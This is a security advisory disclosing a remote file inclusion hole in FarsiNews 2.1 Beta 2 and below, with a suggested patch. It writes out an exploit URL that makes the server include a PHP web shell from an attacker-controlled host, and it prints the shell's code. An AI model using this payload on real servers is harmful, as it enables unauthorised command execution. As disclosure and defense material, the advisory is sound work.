Remote File Inclusion in FarsiNews 2.1 and below
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :admin (at) hamid (dot) ir. [email concealed]
The original article can be found at :
http://hamid.ir/security
Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below
Vulnerable Code:
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");
Exploits:
If register_globals=ON has been marked (check
PHP.INI) we can exploit below URL to cause it to
include external file.
The following URL will cause the server to include
external files ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell
.txt?
phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");
?>
-----[EOF]--------
Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add
the following line in the second line of
loginout.php:
if (isset($_REQUEST["cutepath"])){ die("Patched by
Hamid Ebadi -->http://hamid.ir ( Hamid Network
Security Team) "); }
Signature
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum